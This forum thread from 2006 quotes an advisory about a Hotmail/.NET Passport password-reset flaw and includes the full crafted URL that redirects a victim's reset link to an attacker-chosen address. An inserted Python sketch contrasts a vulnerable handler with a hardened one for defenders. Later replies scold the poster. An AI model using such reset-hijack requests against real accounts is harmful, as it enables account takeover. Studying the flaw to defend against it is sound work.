> Password Reset Vulnerability
me-here
post Apr 22 2006, 10:19 AM
Post #1


Newbie [ Level 1 ]

Group: Members
Posts: 7
Joined: 22-April 06
Member No.: 12,929



Is it working now...?

QUOTE
An attacker can reset any Microsoft Hotmail/.Net Passport user account
with no prior information like state, zip, country, answer to the secret
question and the old password. Normally, a user has to answer the
security questions and then answer the secret question if he wants to
reset his password. By exploiting this vulnerability, an attacker can
submit a specially crafted URL to get the password reset instructions
and reset any user's password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no
fix available yet, no technical details are being made available with
this advisory. Full technical details will be made available on our
website once the vulnerability is fixed by Microsoft. Please note that
we were forced to release this information publicly as these
vulnerabilities are actively being exploited in the wild and are one of
the most severe vulnerabilities ever found in Microsoft Hotmail/.Net
Passport.


The flaw is exploited by opening the following URL in a web browser:

https://register.passport.net/emailpwdreset.srf?lc=1033
&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

After that, the URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.



This post has been edited by me-here: Apr 22 2006, 10:27 AM
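Added example, not part of the original thread or the advisory: a sketch of the class of flaw the first post describes, next to a hardened form. It assumes (the advisory withholds technical details) that the reset handler took the delivery address from the `prefem` query parameter; the account store, function names, host and addresses are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed account store: account address -> recovery address on file.
ACCOUNTS = {"alice@example.com": "alice-recovery@example.net"}

# Constructed request using the parameter names shown in the post.
SAMPLE = ("https://reset.example.com/emailpwdreset?lc=1033"
          "&em=alice@example.com&id=&cb=&prefem=other@example.org&rst=")

def _params(url):
    """First value of each query parameter, keeping blank ones."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}

def reset_recipient_vulnerable(url):
    """Assumed flawed pattern: the request decides where the reset link goes."""
    p = _params(url)
    if p.get("em") not in ACCOUNTS:
        return None
    # A caller-supplied prefem overrides the address on file.
    return p.get("prefem") or ACCOUNTS[p["em"]]

def reset_recipient_hardened(url):
    """Hardened: only the server-side address is used.

    Returns (recipient, suspicious). A client-supplied destination is
    ignored, and a mismatch is flagged so it can be logged and alerted on.
    """
    p = _params(url)
    on_file = ACCOUNTS.get(p.get("em"))
    if on_file is None:
        return None, False
    supplied = p.get("prefem", "")
    suspicious = bool(supplied) and supplied.lower() != on_file.lower()
    return on_file, suspicious

if __name__ == "__main__":
    print("vulnerable ->", reset_recipient_vulnerable(SAMPLE))
    print("hardened   ->", reset_recipient_hardened(SAMPLE))
```

The same mismatch test can be run over web server access logs to find past requests where the supplied destination differed from the account's stored recovery address.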
miCRoSCoPiC^eaRt...
post Apr 22 2006, 01:15 PM
Post #2


PsYcheDeLiC dR3aMeR

Group: Admin
Posts: 2,242
Joined: 29-January 05
From: Nakorn Chaisri, Thailand
Member No.: 2,411
myCENTs:84.36



For God's sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize in posting quoted material from other sites?
jlhaslip
post Apr 22 2006, 10:49 PM
Post #3


Advanced Member

Group: Members
Posts: 189
Joined: 15-November 05
From: Inland from the Left Coast of Canada
Member No.: 9,627
myCENTs:62.43



O.o, never seen M^E this mad before. Musta really got under his skin...
Logan Deathbring...
post Apr 24 2006, 05:51 AM
Post #4


Geek in-training

Group: Members
Posts: 301
Joined: 2-July 05
From: Washington State, USA, 3rd Rock from the Star Sol
Member No.: 6,772



Yes, the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They currently are working on, or have fixed, that problem already. As for how to do it, that's above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off.

As for the post... I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm... juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.